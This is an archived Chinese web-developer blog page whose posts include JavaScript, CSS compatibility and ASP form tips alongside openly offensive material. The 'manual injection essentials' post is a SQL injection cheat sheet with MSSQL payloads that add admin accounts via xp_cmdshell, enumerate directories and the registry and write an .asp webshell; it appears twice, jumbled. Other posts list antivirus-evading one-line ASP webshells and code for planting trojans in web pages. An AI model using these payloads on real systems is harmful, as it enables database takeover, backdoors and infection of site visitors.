博客园-木柯的园子

为何js函数中使用return后表单仍旧提交了

萧木柯 — Tue, 16 Jun 2009 05:43:00 GMT

刚才做一个表单提交的时候，发现return后照样提交了，但是原来的程序是没问题的，后来改成了另一个提交表单就出现这种问题了，反复测试和排除，最终终于锁定了问题。。。。。。靠！！！！！！！！！竟然是图片按钮在js事件中不受return的限制，照样会提交，而button就不会。解决办法：查了相应函数后得知，在return之前加以下一句就好了：event.returnValue=false;

function formok()
{
alert("formok");
alert("foyyyyyyyyrmok");
event.returnValue=false;
return;
alert("not is ok");
this.form1.submit();

在return前加了那句后就不会提交表单了

--------------------------
新闻：IBM发布全球首款开源智能编译器
网站导航: 博客园首页新闻 .NET频道社区博问闪存找找看

超简单---鼠标滑过变换图片

萧木柯 — Thu, 28 May 2009 12:07:00 GMT

鼠标滑过，图片变换，非常实用，用JS可以很容易做到，但是JS完成后有个缺陷，在滑过的时候，第一次可能是空白的，然后才显示，因为要下载图片，网速慢的时候更加明显。其实用CSS实现更容易，而且不会出现上面的短暂显示空白的小问题。

CSS实现例子：

CSS实现鼠标滑过变换图片

其实就是利用了A的hover属性，来改变背景图片的平铺位置。top left 和bottom left，就这么简单就完成了。如果想每个图片都不一样，变换的页不一样，定义成ID就可以了。

--------------------------
新闻：IE颓势不减微软下月公布最新浏览器架构
网站导航: 博客园首页新闻 .NET频道社区博问闪存找找看

手工注入精华

萧木柯 — Wed, 27 May 2009 02:57:00 GMT

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ’’=’

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’

5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0  1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ’’=’

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’

5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值（access）
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值（mssql）
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）
;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--
;and 1=(select IS_MEMBER(’db_owner’));--

11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell ’net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--

;exec master.dbo.xp_cmdshell ’net user username password /add’;--

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ’c:\’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ’c:\’;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:\’;-- 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:\web\index.asp’;-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名
;exec xp_regread
’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’,’reg_sz’,’hello’ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’ 删除某个值

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (’’);
backup database model to disk=’c:\l.asp’;

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (’’);

backup database model to disk=’g:\wwwtest\l.asp’;

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值（access）
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值（mssql）
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）
;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--
;and 1=(select IS_MEMBER(’db_owner’));--

11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell ’net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--

;exec master.dbo.xp_cmdshell ’net user username password /add’;--

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ’c:\’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ’c:\’;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:\’;-- 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:\web\index.asp’;-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名
;exec xp_regread
’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’,’reg_sz’,’hello’ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’ 删除某个值

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (’’);
backup database model to disk=’c:\l.asp’;

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (’’);

backup database model to disk=’g:\wwwtest\l.asp’;

--------------------------
新闻：竞争日趋激烈微软欲借 Windows 7 扭转战局
网站导航: 博客园首页新闻 .NET频道社区博问闪存找找看

一句话木马的变形写法

萧木柯 — Fri, 15 May 2009 03:14:00 GMT

一句木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。但是正是因为它短小精悍，所以目标特征也很明显，非常容易被杀软等过滤和杀掉，网上目前有些变种，现收集了一些，供收藏。

asp一句话
<%execute(request("1"))%>

php一句话

aspx一句话

可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<%,%>'的asp一句话

不用双引号的一句话。
<%eval request(chr(35))%>

--------------------------
新闻：上海电信计划2012年80%用户实现100M带宽
网站导航: 博客园首页新闻 .NET频道社区博问闪存找找看

挂马代码大全

萧木柯 — Mon, 11 May 2009 04:34:00 GMT

一:框架挂马

二:js文件挂马
首先将以下代码
document.write("");
保存为xxx.js，
则JS挂马代码为

三:js变形加密

muma.txt可改成任意后缀
四:body挂马

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '"r"nhttp://www.xxx.com/muma.htm/">';
六:css中挂马
body {
background-image: url('javascript:document.write("")')}
七:JAJA挂马

八:图片伪装

九:伪装调用：

十:高级欺骗
http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" > 页面要显示的内容

--------------------------
新闻：数万名网友签名抗议星际争霸2取消局域网功能
网站导航: 博客园首页新闻 .NET频道社区博问闪存找找看

一句话木马的原理

萧木柯 — Mon, 11 May 2009 04:31:00 GMT

2009年02月21日星期六 15:16

一句话木马:来解释下它的原理

首先

background-image: url('AD/tamkuang.gif'); padding-right: 1px; padding-bottom: 1px; width:254px; height:194px;" colSpan=2>

汽车 4S 店导航网X

值得注意的地方：由于遨游，TheWorld等浏览器有弹窗广告拦截功能，所以代码中红色的地方没直接插入图片，那样会让它们作为广告过滤掉，所以直接将图片做成背景，它识不出来了，可以安全打开，不会被拦截掉。

--------------------------
新闻：Silverlight打造杰克逊纪念专题
网站导航: 博客园首页新闻 .NET频道社区博问闪存找找看

最全面的CSS浏览器兼容问题整理

萧木柯 — Mon, 06 Apr 2009 05:36:00 GMT

CSS对浏览器的兼容性有时让人很头疼,或许当你了解当中的技巧跟原理,就会觉得也不是难事,从网上收集了IE7,6与Fireofx的兼容性处理方法并整理了一下.对于web2.0的过度,请尽量用xhtml格式写代码,而且DOCTYPE 影响 CSS 处理,作为W3C的标准,一定要加DOCTYPE声名.

CSS技巧

1.div的垂直居中问题

vertical-align:middle; 将行距增加到和整个DIV一样高 line-height:200px; 然后插入文字，就垂直居中了。缺点是要控制内容不要换行

2. margin加倍的问题

设置为float的div在ie下设置的margin会加倍。这是一个ie6都存在的bug。解决方案是在这个div里面加上display:inline;
例如：
<#div id=”imfloat”>
相应的css为
#IamFloat{
float:left;
margin:5px;
display:inline;}

3.浮动ie产生的双倍距离

#box{ float:left; width:100px; margin:0 0 0 100px; //这种情况之下IE会产生200px的距离 display:inline; //使浮动忽略}
这里细说一下block与inline两个元素：block元素的特点是,总是在新行上开始,高度,宽度,行高,边距都可以控制(块元素);Inline元素的特点是,和其他元素在同一行上,不可控制(内嵌元素);
#box{ display:block; //可以为内嵌元素模拟为块元素 display:inline; //实现同一行排列的效果 diplay:table;

4 IE与宽度和高度的问题

IE不认得min-这个定义，但实际上它把正常的width和height当作有min的情况来使。这样问题就大了，如果只用宽度和高度，正常的浏览器里这两个值就不会变，如果只用min-width和min-height的话，IE下面根本等于没有设置宽度和高度。
比如要设置背景图片，这个宽度是比较重要的。要解决这个问题，可以这样：
#box{ width: 80px; height: 35px;}html>body #box{ width: auto; height: auto; min-width: 80px; min-height: 35px;}

5.页面的最小宽度

min-width是个非常方便的CSS命令，它可以指定元素最小也不能小于某个宽度，这样就能保证排版一直正确。但IE不认得这个，而它实际上把width当做最小宽度来使。为了让这一命令在IE上也能用，可以把一个

放到标签下，然后为div指定一个类,然后CSS这样设计：
#container{ min-width: 600px; width:expression(document.body.clientWidth < 600? "600px": "auto" );}
第一个min-width是正常的；但第2行的width使用了Javascript，这只有IE才认得，这也会让你的HTML文档不太正规。它实际上通过Javascript的判断来实现最小宽度。

6.DIV浮动IE文本产生3象素的bug

左边对象浮动，右边采用外补丁的左边距来定位，右边对象内的文本会离左边有3px的间距.
#box{ float:left; width:800px;}
#left{ float:left; width:50%;}
#right{ width:50%;}
*html #left{ margin-right:-3px; //这句是关键}

id="box">

id="left">

id="right">

7.IE捉迷藏的问题

当div应用复杂的时候每个栏中又有一些链接，DIV等这个时候容易发生捉迷藏的问题。
有些内容显示不出来，当鼠标选择这个区域是发现内容确实在页面。解决办法：对#layout使用line-height属性或者给#layout使用固定高和宽。页面结构尽量简单。

8.float的div闭合;清除浮动;自适应高度;

①例如：<#div id=”floatA” ><#div id=”floatB” ><#div id=”NOTfloatC” >这里的NOTfloatC并不希望继续平移，而是希望往下排。(其中floatA、floatB的属性已经设置为float:left;)
这段代码在IE中毫无问题，问题出在FF。原因是NOTfloatC并非float标签，必须将float标签闭合。在 <#div class=”floatB”> <#div class=”NOTfloatC”>之间加上 <#div class=”clear”>这个div一定要注意位置，而且必须与两个具有float属性的div同级，之间不能存在嵌套关系，否则会产生异常。并且将clear这种样式定义为为如下即可： .clear{ clear:both;}

②作为外部 wrapper 的 div 不要定死高度,为了让高度能自动适应，要在wrapper里面加上overflow:hidden; 当包含float的box的时候，高度自动适应在IE下无效，这时候应该触发IE的layout私有属性(万恶的IE啊！)用zoom:1;可以做到，这样就达到了兼容。
例如某一个wrapper如下定义：
.colwrapper{ overflow:hidden; zoom:1; margin:5px auto;}

③对于排版,我们用得最多的css描述可能就是float:left.有的时候我们需要在n栏的float div后面做一个统一的背景,譬如:

id=”page”>

id=”left”>

id=”center”>

id=”right”>

比如我们要将page的背景设置成蓝色,以达到所有三栏的背景颜色是蓝色的目的,但是我们会发现随着left center right的向下拉长,而page居然保存高度不变,问题来了,原因在于page不是float属性,而我们的page由于要居中,不能设置成float,所以我们应该这样解决

id=”page”>

id=”bg” style=”float:left;width:100%”>

id=”left”>

id=”center”>

id=”right”>

再嵌入一个float left而宽度是100%的DIV解决之

④万能float 闭合(非常重要!)
关于 clear float 的原理可参见 [How To Clear Floats Without Structural Markup],将以下代码加入Global CSS 中,给需要闭合的div加上 class="clearfix" 即可,屡试不爽.

.clearfix:after { content:"."; display:block; height:0; clear:both; visibility:hidden; }
.clearfix { display:inline-block; }

.clearfix {display:block;}

或者这样设置：.hackbox{ display:table; //将对象作为块元素级的表格显示}

11.高度不适应

高度不适应是当内层对象的高度发生变化时外层高度不能自动进行调节，特别是当内层对象使用margin 或paddign 时。
例：
#box {background-color:#eee; }
#box p {margin-top: 20px;margin-bottom: 20px; text-align:center; }

id="box">

p对象中的内容

解决方法：在P对象上下各加2个空的div对象CSS代码：.1{height:0px;overflow:hidden;}或者为DIV加上border属性。

12 .IE6下为什么图片下有空隙产生

解决这个BUG的方法也有很多,可以是改变html的排版,或者设置img 为display:block 或者设置vertical-align 属性为vertical-align:top | bottom |middle |text-bottom 都可以解决.

13.如何对齐文本与文本输入框

加上 vertical-align:middle;

14.web标准中定义id与class有什么区别吗

一.web标准中是不容许重复ID的,比如 div id="aa" 不容许重复2次,而class 定义的是类,理论上可以无限重复, 这样需要多次引用的定义便可以使用他.

二.属性的优先级问题
ID 的优先级要高于class,看上面的例子

三.方便JS等客户端脚本,如果在页面中要对某个对象进行脚本操作,那么可以给他定义一个ID,否则只能利用遍历页面元素加上指定特定属性来找到它,这是相对浪费时间资源,远远不如一个ID来得简单.

15. LI中内容超过长度后以省略号显示的方法

此方法适用与IE与OP浏览器

16.为什么web标准中IE无法设置滚动条颜色了

解决办法是将body换成html
html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
http-equiv="Content-Type" content="text/html; charset=gb2312" />

17.为什么无法定义1px左右高度的容器

IE6下这个问题是因为默认的行高造成的,解决的方法也有很多,例如:overflow:hidden | zoom:0.08 | line-height:1px

18.怎么样才能让层显示在FLASH之上呢

解决的办法是给FLASH设置透明
name="wmode" value="transparent" />

19.怎样使一个层垂直居中于浏览器中

这里我们使用百分比绝对定位,与外补丁负值的方法,负值的大小为其自身宽度高度除以二

FF与IE

1. Div居中问题

div设置 margin-left, margin-right 为 auto 时已经居中，IE 不行，IE需要设定body居中，首先在父级元素定义text-algin: center;这个的意思就是在父级元素内的内容居中。

2.链接(a标签)的边框与背景

a链接加边框和背景色，需设置 display: block, 同时设置 float: left 保证不换行。参照 menubar, 给 a 和 menubar 设置高度是为了避免底边显示错位, 若不设 height, 可以在 menubar 中插入一个空格。

3.超链接访问过后hover样式就不出现的问题

被点击访问过的超链接样式不在具有hover和active了,很多人应该都遇到过这个问题,解决方法是改变CSS属性的排列顺序: L-V-H-A
Code:

4. 游标手指cursor

cursor: pointer 可以同时在 IE FF 中显示游标手指状， hand 仅 IE 可以

5.UL的padding与margin

ul标签在FF中默认是有padding值的,而在IE中只有margin默认有值,所以先定义 ul{margin:0;padding:0;}就能解决大部分问题

6. FORM标签

这个标签在IE中,将会自动margin一些边距,而在FF中margin则是0,因此,如果想显示一致,所以最好在css中指定margin和padding,针对上面两个问题,我的css中一般首先都使用这样的样式ul,form{margin:0;padding:0;}给定义死了,所以后面就不会为这个头疼了.

7. BOX模型解释不一致问题

在FF和IE中的BOX模型解释不一致导致相差2px解决方法：div{margin:30px!important;margin:28px;} 注意这两个margin的顺序一定不能写反， important这个属性IE不能识别，但别的浏览器可以识别。所以在IE下其实解释成这样： div{maring:30px;margin:28px}重复定义的话按照最后一个来执行，所以不可以只写margin:xx px!important;
#box{ width:600px; //for ie6.0- w\idth:500px; //for ff+ie6.0}
#box{ width:600px!important //for ff width:600px; //for ff+ie6.0 width :500px; //for ie6.0-}

8.属性选择器(这个不能算是兼容,是隐藏css的一个bug)

p[id]{}div[id]{}
这个对于IE6.0和IE6.0以下的版本都隐藏,FF和OPera作用.属性选择器和子选择器还是有区别的,子选择器的范围从形式来说缩小了,属性选择器的范围比较大,如p[id]中,所有p标签中有id的都是同样式的.

9.最狠的手段 - !important;

如果实在没有办法解决一些细节问题,可以用这个方法.FF对于”!important”会自动优先解析,然而IE则会忽略.如下
.tabd1{
background:url(/res/images/up/tab1.gif) no-repeat 0px 0px !important;
background:url(/res/images/up/tab1.gif) no-repeat 1px 0px; }
值得注意的是，一定要将xxxx !important 这句放置在另一句之上，上面已经提过

10.IE,FF的默认值问题

或许你一直在抱怨为什么要专门为IE和FF写不同的CSS，为什么IE这样让人头疼，然后一边写css，一边咒骂那个可恶的M$ IE.其实对于css的标准支持方面，IE并没有我们想象的那么可恶，关键在于IE和FF的默认值不一样而已，掌握了这个技巧，你会发现写出兼容FF和IE的css并不是那么困难，或许对于简单的css，你完全可以不用”!important”这个东西了。
我们都知道，浏览器在显示网页的时候，都会根据网页的css样式表来决定如何显示，但是我们在样式表中未必会将所有的元素都进行了具体的描述，当然也没有必要那么做，所以对于那些没有描述的属性，浏览器将采用内置默认的方式来进行显示，譬如文字，如果你没有在css中指定颜色，那么浏览器将采用黑色或者系统颜色来显示，div或者其他元素的背景，如果在css中没有被指定，浏览器则将其设置为白色或者透明，等等其他未定义的样式均如此。所以有很多东西出现FF和IE显示不一样的根本原因在于它们的默认显示不一样，而这个默认样式该如何显示我知道在w3中有没有对应的标准来进行规定，因此对于这点也就别去怪罪IE了。

11.为什么FF下文本无法撑开容器的高度

标准浏览器中固定高度值的容器是不会象IE6里那样被撑开的,那我又想固定高度,又想能被撑开需要怎样设置呢？办法就是去掉height设置min-height:200px; 这里为了照顾不认识min-height的IE6 可以这样定义:

{
height:auto!important;
height:200px;
min-height:200px;
}

12.FireFox下如何使连续长字段自动换行

众所周知IE中直接使用 word-wrap:break-word 就可以了, FF中我们使用JS插入的方法来解决

id="ff">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

type="text/javascrīpt">

function toBreakWord(el, intLen){
var ōbj=document.getElementById(el);
var strContent=obj.innerHTML;
var strTemp="";
while(strContent.length>intLen){
strTemp+=strContent.substr(0,intLen)+" ";
strContent=strContent.substr(intLen,strContent.length);
}
strTemp+=" "+strContent;
obj.innerHTML=strTemp;
}
if(document.getElementById && !document.all) toBreakWord("ff", 37);

13.为什么IE6下容器的宽度和FF解释不同呢

version="1.0" encoding="gb2312"?>
html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
http-equiv="Content-Type" content="text/html; charset=gb2312" />

ōnclick="alert(this.offsetWidth)">让FireFox与IE兼容

问题的差别在于容器的整体宽度有没有将边框（border）的宽度算在其内,这里IE6解释为200PX ,而FF则解释为220PX,那究竟是怎么导致的问题呢？大家把容器顶部的xml去掉就会发现原来问题出在这,顶部的申明触发了IE的qurks mode,关于qurks mode、standards mode的相关知识,请参考:http://www.microsoft.com/china/msdn/library/webservices/asp.net/
ASPNETusStan.mspx?mfr=true

IE6,IE7,FF

IE7.0出来了，对CSS的支持又有新问题。浏览器多了，网页兼容性更差了，疲于奔命的还是我们，为解决IE7.0的兼容问题，找来了下面这篇文章：现在我大部分都是用!important来hack，对于ie6和firefox测试可以正常显示，但是ie7对!important可以正确解释，会导致页面没按要求显示！下面是三个浏览器的兼容性收集.

第一种，是CSS HACK的方法

height:20px;
*height:25px;
_height:20px;

注意顺序。

这样也属于CSS HACK，不过没有上面这样简洁。
#example { color: #333; }
* html #example { color: #666; }
*+html #example { color: #999; }

第二种，是使用IE专用的条件注释

rel="stylesheet" type="text/css" href="css.css" />

rel="stylesheet" type="text/css" href="ie7.css" />

rel="stylesheet" type="text/css" href="ie.css" />

第三种，css filter的办法，以下为经典从国外网站翻译过来的。.

新建一个css样式如下：
#item {
width: 200px;
height: 200px;
background: red;
}

新建一个div,并使用前面定义的css的样式：

id="item">some text here

在body表现这里加入lang属性,中文为zh：
lang="en">

现在对div元素再定义一个样式：
*:lang(en) #item{
background:green !important;
}

这样做是为了用!important覆盖原来的css样式,由于:lang选择器ie7.0并不支持,所以对这句话不会有任何作用,于是也达到了ie6.0下同样的效果,但是很不幸地的是,safari同样不支持此属性,所以需要加入以下css样式：
#item:empty {
background: green !important
}
:empty选择器为css3的规范,尽管safari并不支持此规范,但是还是会选择此元素,不管是否此元素存在,现在绿色会现在在除ie各版本以外的浏览器上。

对IE6和FF的兼容可以考虑以前的!important 个人比较喜欢用第一种，简洁，兼容性比较好。

--------------------------
新闻：传诺基亚正在开发Android手机
网站导航: 博客园首页新闻 .NET频道社区博问闪存找找看

asp表单安全 --- 防止后退和刷新多次提交表单

萧木柯 — Tue, 24 Mar 2009 15:55:00 GMT

为了防止用户通过后退和刷新提交页面而产生的重复提交，可以采用以下办法。

防止后退：页面顶部加入以下代码，禁止浏览器缓存页面

<% '禁止后退
Response.Buffer = True
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
%>

防止刷新提交页而产生重复提交：

STEP1、我在表单提交页设置 <% Session.Contents("work")="yes" %>

"> 这个隐藏域不要也可以

STEP2、在处理提交表单数据页（add_work.asp）有一个判断代码：

<%if Session.Contents("work")="yes" then %>

%
set rs=server.createobject("adodb.recordset")
sql="select * from work"
rs.open sql,conn,1,3
rs.addnew
work_ask=request.form("work_ask")

rs("work_ask")=work_ask

rs.update '更新数据表记录
rs.close
set rs=nothing
conn.close
Set conn=Nothing
Session.Contents("work")="no" '更新成功后将值设置为no
%>

表单提交成功

<% Else If Session.Contents("work")="no" then '不成功则提示然后转跳
response.write ("")
end if
%>

以上方法试验过可行，还有其它方法：如用window.open弹出表单页面，点提交后关闭该页；处理提交的ASP页也是用弹出，设定表单的target,点提交时window.open("XXX.asp","_blank"),然后用JS来提交表单，完成后window.close()；
简单的说，就是提交表单的时候弹出新窗口，关闭本窗口。对于window.open()打开的窗口怎么后退？能后退到哪里去？其实最简单的方法就是提交后在服务器端直接转跳，但是这样看不到提示信息了。。。。

--------------------------
新闻：7月编程语言排行榜
网站导航: 博客园首页新闻 .NET频道社区博问闪存找找看